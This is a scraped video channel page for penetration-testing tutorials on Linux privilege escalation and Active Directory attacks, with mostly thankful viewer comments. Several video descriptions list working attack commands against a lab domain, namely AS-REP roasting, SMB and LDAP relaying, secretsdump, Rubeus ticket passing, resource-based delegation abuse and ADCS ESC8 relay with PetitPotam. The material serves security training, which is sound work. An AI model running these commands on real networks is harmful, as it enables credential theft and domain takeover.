Thatquietkid
Thatquietkid
  • Видео 89
  • Просмотров 264 942
Linux Privilege Escalation Series: Part 7 (Shared Library and Environment Variable LD_PRELOAD)
Topic Covered:
Shared Library and Environment Variable LD_PRELOAD
Steps for lab setup that you have to do yourself:
1) Login into VM and switch user to root (toor is the pass)
2) visudo (add this line: Defaults env_keep += LD_PRELOAD)
3) Save the file
Просмотров: 66

Видео

Linux Privilege Escalation Series: Part 6 (Docker and LXD)
Просмотров 81Месяц назад
Topics Covered: Docker and LXD Timestamps: 00:00 - 05:48 (Docker) 05:49 - 13:47 (LXD)
Linux Privilege Escalation Series: Part 5 (CAP_DAC_READ_SEARCH, CAP_SETUID, SYS_ADMIN, SYS_Module)
Просмотров 177Месяц назад
Topics Covered: Capabilities: 1) CAP_DAC_READ_SEARCH 2) CAP_SETUID 3) CAP_SYS_ADMIN 4) CAP_SYS_MODULE Timestamps: 00:00 - 05:24 (CAP_DAC_READ_SEARCH) 5:25 - 08:17 (CAP_SETUID) 08:18 - 13:50 (CAP_SYS_ADMIN) 13:51 - 20:35 (CAP_SYS_MODULE)
Linux Privilege Escalation Series: Part 4 (Path Variable and Restricted Shell)
Просмотров 140Месяц назад
Topics Covered: Path Variable exploitation and escaping Restricted Shell Timestamps: 00:00 - 08:56 (Path Variable) 08:57 - 12:05 (Escaping Restricted Shell)
Linux Privilege Escalation Series: Part 3 (NFS and Wildcard)
Просмотров 169Месяц назад
Topics Covered: NFS share exploitation and Wildcard Injection Timestamps: 00:00 - 06:33 (Misconfigured NFS) 06:33 - 12:32 (Wildcard Injection)
Linux Privilege Escalation Series: Part 2 (Cronjob and Service)
Просмотров 233Месяц назад
Topics Covered: Cronjobs and Services Timestamps: 00:00 - 05:54 (Cronjobs Privilege Escalation) 5:55 - 13:24 (Service Privilege Escalation)
Linux Privilege Escalation Series: Part 1
Просмотров 174Месяц назад
This video is the first of the linux privilege escalation series. Topics Covered: Password in files, Misconfigured File Permissions, Sudo Permissions and SUID Permissions. Timestamps: 00:00 - 00:45 (Intro and all) 00:45 - 3:28 (Password in Files) 3:28 - 5:36 (Misconfigured File Permissions) 5:37 - 7:33 (Sudo Permissions) 7:43 - 11:12 (SUID Permission) Lab Link: github.com/AnikateSawhney/Linux-P...
My CRTP Experience (I Passed the Exam)
Просмотров 1,3 тыс.9 месяцев назад
CRTP Course link: www.alteredsecurity.com/adlab
ACLs Abuse
Просмотров 32910 месяцев назад
Welcome to my RUclips channel. In this video, I delve into ACLs abuse, aiming to provide valuable insights and educational content. Educational Purpose: Learn how to exploit ACLs in an active directory environment. Disclaimer: This video is intended solely for educational purposes. It explores Active Directory Attack vector - ACLsAbuse. I do not endorse or encourage any unethical or malicious a...
AS-REP Roasting Attack
Просмотров 19011 месяцев назад
Commands used: 1) impacket-GetNPUsers BERSERK.local/ -usersfile users.txt -dc-ip 10.0.2.16 2) john wordlist=wordlist.txt hash.txt 3) crackmapexec smb 10.0.2.16 -u roastme -p 'R0asting!!' Feel free to ask any doubts in the comment section.
IPV6 DNS Takeover Attack
Просмотров 55411 месяцев назад
Link to the repository: github.com/dirkjanm/mitm6 Commands used: 1) mitm6 -d BERSERK.local 2) impacket-ntlmrelayx -6 -t ldaps://10.0.2.16 -wh fakepad.BERSERK.local -l loot 3) impacket-secretsdump -dc-ip 10.0.2.16 -just-dc BERSERK.local/'user':'password'@10.0.2.16. Feel free to ask any doubts in the comments section.
Unconstrained Delegation Attack
Просмотров 45911 месяцев назад
Commands used: 1) dir \\DC1\c$ 2) .\Rubeus.exe monitor /interval:5 3) klist 4) .\Rubeus.exe ptt /ticket: 5) klist 6) dir \\DC1\c$ 7) Enter-PSSession -ComputerName DC1 Feel free to ask any doubts in the comment section.
Resource-based Constrained Delegation (RBCD)
Просмотров 1 тыс.11 месяцев назад
Commands used: 1) crackmapexec ldap 10.0.2.16 -u rbcd -p 'd3l3g@tion!!' -M maq 2) impacket-addcomputer -computer-name 'Test$' -computer-pass 'Test@123!!' -dc-ip 10.0.2.16 'BERSERK.local'/'rbcd':'d3l3g@tion!!' 3) impacket-rbcd -delegate-from 'Test$' -delegate-to 'Win10$' -dc-ip 10.0.2.16 -action 'write' 'BERSERK.local'/'rbcd':'d3l3g@tion!!' 4) impacket-getST -spn 'cifs/Win10.BERSERK.local' -impe...
SMB Relay Attack
Просмотров 1,4 тыс.11 месяцев назад
Commands used: 1) nano /etc/responder/Responder.conf (turn off SMB and HTTP server) 2) responder -I eth0 3) impacket-ntlmrelayx -tf targets.txt -smb2support Feel free to ask any doubts in the comment section.
Exploiting Misconfigured ADCS: ESC8 (PART 2)
Просмотров 303Год назад
Corrections: At 4:11 The Domain Controller Machine Account by default has DCSync Rights. At 9:26 Unauthorized At 11:45 Didn't specify the extension Commands Used: 1) certipy relay -target 192.168.0.170/ -template Domain Controller. 2) python3 petitpotam.py -u reze -p 'b0mbd3vil!!' 192.168.0.136 192.168.0.160. 3) certipy auth -pfx dc1.pfx -dc-ip 192.168.0.170 4) crackmapexec smb 192.168.0.160 -u...
Exploiting Misconfigured ADCS: ESC8
Просмотров 447Год назад
Exploiting Misconfigured ADCS: ESC8
WebClient Workstation Takeover
Просмотров 218Год назад
WebClient Workstation Takeover
Exploiting Vulnerable Active Directory Certificate Template: ESC4
Просмотров 426Год назад
Exploiting Vulnerable Active Directory Certificate Template: ESC4
Exploiting Vulnerable Active Directory Certificate Template: ESC1
Просмотров 3,2 тыс.Год назад
Exploiting Vulnerable Active Directory Certificate Template: ESC1
MY OSCP EXAM EXPERIENCE(FAILED WITH 60 POINTS)
Просмотров 1,2 тыс.Год назад
MY OSCP EXAM EXPERIENCE(FAILED WITH 60 POINTS)
Copy and Paste text from Windows Host Machine to Ubuntu Virtual Machine
Просмотров 100 тыс.2 года назад
Copy and Paste text from Windows Host Machine to Ubuntu Virtual Machine
Microsoft Windows Hardening Tryhackme
Просмотров 2,6 тыс.2 года назад
Microsoft Windows Hardening Tryhackme
Kali Linux Update error (Could not connect to http.kali.org)
Просмотров 67 тыс.2 года назад
Kali Linux Update error (Could not connect to http.kali.org)
Intro to Malware Analysis Tryhackme
Просмотров 2,1 тыс.2 года назад
Intro to Malware Analysis Tryhackme
Nmap Tryhackme
Просмотров 1052 года назад
Nmap Tryhackme
How to install android 9 as a virtual machine
Просмотров 5762 года назад
How to install android 9 as a virtual machine
How to convert any python file to .exe
Просмотров 1222 года назад
How to convert any python file to .exe
Intrusion Detection Tryhackme
Просмотров 3,5 тыс.2 года назад
Intrusion Detection Tryhackme
NPTEL Ethical Hacking Week 12 Assignment Answers
Просмотров 5 тыс.2 года назад
NPTEL Ethical Hacking Week 12 Assignment Answers
NPTEL Ethical Hacking Week 11 Assignment Answers
Просмотров 3,6 тыс.2 года назад
NPTEL Ethical Hacking Week 11 Assignment Answers

Комментарии

  • @alexaeeex7883
    @alexaeeex7883 5 часов назад

    Had the same issue If doesn't work , close terminal then restart virtual and try it again.From my side it worked

  • @sairashbudhathoki1242
    @sairashbudhathoki1242 3 дня назад

    Telling This one... bzip2 not found. Please install: bzip2 tar; and try again.

  • @patrickmilad7714
    @patrickmilad7714 3 дня назад

    Didn't work, i restarted and everything

  • @slimshade
    @slimshade 12 дней назад

    Finally 😢, thanks man ❤

  • @Aditya-t6z7w
    @Aditya-t6z7w 13 дней назад

    Thank you brother ❤❤❤❤

  • @fbiagent4418
    @fbiagent4418 19 дней назад

    Thanks!

  • @Intradaywithphani
    @Intradaywithphani 21 день назад

    not wokring

  • @Podcastshoti
    @Podcastshoti 24 дня назад

    bro as u shown in your'er creds.txt that all username pass are same but when i am trying to login it does'nt accepts from user1 to user7 ?? so what is its passwords are ???

    • @thatquietkid8610
      @thatquietkid8610 24 дня назад

      @@Podcastshoti the password for user1 is user1. Same for every user.

  • @SaiSindhuChalla
    @SaiSindhuChalla 27 дней назад

    It worked. Thank you.

  • @mixedvideozz1655
    @mixedvideozz1655 Месяц назад

    Thank It's Worked

  • @thatquietkid8610
    @thatquietkid8610 Месяц назад

    Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab

  • @thatquietkid8610
    @thatquietkid8610 Месяц назад

    Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab

  • @thatquietkid8610
    @thatquietkid8610 Месяц назад

    Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab

  • @thatquietkid8610
    @thatquietkid8610 Месяц назад

    Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab

  • @thatquietkid8610
    @thatquietkid8610 Месяц назад

    Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab

  • @thatquietkid8610
    @thatquietkid8610 Месяц назад

    Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab

  • @thatquietkid8610
    @thatquietkid8610 Месяц назад

    Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab

  • @dian__rose_
    @dian__rose_ Месяц назад

    it says vboxlinuxadditions command not found

  • @sh-lly
    @sh-lly Месяц назад

    Thank you so much man

  • @thatquietkid8610
    @thatquietkid8610 Месяц назад

    A mistake I made during this video, in CAP_SYS_MODULE, when creating the Makefile, modify the content from /lib/... to lib/.. at 18:05 (we need to use our own libraries that we copied)

  • @noushadsharafuddin3983
    @noushadsharafuddin3983 Месяц назад

    Thank you brother. It worked

  • @coolminggt7290
    @coolminggt7290 Месяц назад

    worked at 30th OCT 2024, thank you brother! QUICK TIP : make sure to reboot your VM at the end of the installation

  • @suryasingh9526
    @suryasingh9526 Месяц назад

    🎉

  • @learningtogether5045
    @learningtogether5045 Месяц назад

    Not working

  • @lucijeanej
    @lucijeanej 2 месяца назад

    After I did this I was note able to keep the mouse pointer at Ubuntu VM

  • @valerianus_200
    @valerianus_200 2 месяца назад

    where u download guest addiction?

  • @ariyan_bolandi
    @ariyan_bolandi 2 месяца назад

    Who says that indian programmers are not legends? 😂❤ (It worked)

  • @grayhatbd
    @grayhatbd 2 месяца назад

    Good bro ❤

  • @shakookhan1
    @shakookhan1 2 месяца назад

    Chuntye ye krne kai bd ab dobara se graphical install /install mang rha kya krwa dya farigh insan

  • @CyberIntuit
    @CyberIntuit 3 месяца назад

    Thank you for sharing. This was very informative 👏

  • @albinowolf5920
    @albinowolf5920 3 месяца назад

    I've been trying to find a solution for this for nearly 2 hours now and nothing worked. But this not only fixed the copy and paste, the auto-screen, but also the machine shared files as well. Thank you so much!

  • @sbosonicx
    @sbosonicx 3 месяца назад

    Thank you, I wish I had found your solution much earlier!

  • @moezgrami2378
    @moezgrami2378 3 месяца назад

    Thank you so much!

  • @sandeepverma4650
    @sandeepverma4650 3 месяца назад

    Thank you so much dude, after running all ssh commands, I'm able to connect with the Putty.

  • @NEXUSSEC
    @NEXUSSEC 3 месяца назад

    thanks aniket

  • @AbdelwahabElshenawy
    @AbdelwahabElshenawy 3 месяца назад

    tried it but doesn't work!

  • @mrdipuu
    @mrdipuu 3 месяца назад

    unable to execute aara h

  • @RandomMGyt
    @RandomMGyt 3 месяца назад

    thanks!

  • @PayQH
    @PayQH 3 месяца назад

    Hi, if the domain controller ip isn't available, is it appropriate to run the dc-ip replaced with the adcs server instead? Will that yield the same results?

  • @vivekkashyap7293
    @vivekkashyap7293 4 месяца назад

    Bro how to get coupon code

  • @selrahcjt
    @selrahcjt 4 месяца назад

    thank you @Thatquietkid

  • @AyushAnand-mw6pg
    @AyushAnand-mw6pg 4 месяца назад

    Bhaiya save kaise kre likhne ke bdd? Aur uske bdd back kaise jaaye

  • @loki__575
    @loki__575 4 месяца назад

    Pretty good explanation bro, I was stuck on this. Thanks for help

  • @saidibrahim5931
    @saidibrahim5931 4 месяца назад

    Not working, it says permission denied when I tried to run vboxlinuxadditions

    • @Harbi15
      @Harbi15 3 месяца назад

      did u find a fix?

    • @saidibrahim5931
      @saidibrahim5931 3 месяца назад

      @@Harbi15 not yet, did you find any solution ?

    • @GamerFlobe
      @GamerFlobe Месяц назад

      same problem here

  • @MikeCCO
    @MikeCCO 4 месяца назад

    Thankyou BOSS, Your the MAN ! 😉😊😄😁😁

  • @grzegorzskorupinski9169
    @grzegorzskorupinski9169 4 месяца назад

    works like a charm! thank you Sir! (Oneplus 8 Pro Nethunter)

  • @phillydee3592
    @phillydee3592 4 месяца назад

    Stupid question,how can I add a vulnerable certificate to my DC?

  • @zaidalkurdi447
    @zaidalkurdi447 5 месяцев назад

    this mother f*cker broke my ubuntu

  • @DucDuyDoan-f5i
    @DucDuyDoan-f5i 5 месяцев назад

    Work perfectly fine ! Thanks for your effort, mate.

  • @thecloudacademyvideos
    @thecloudacademyvideos 5 месяцев назад

    Thank you very much.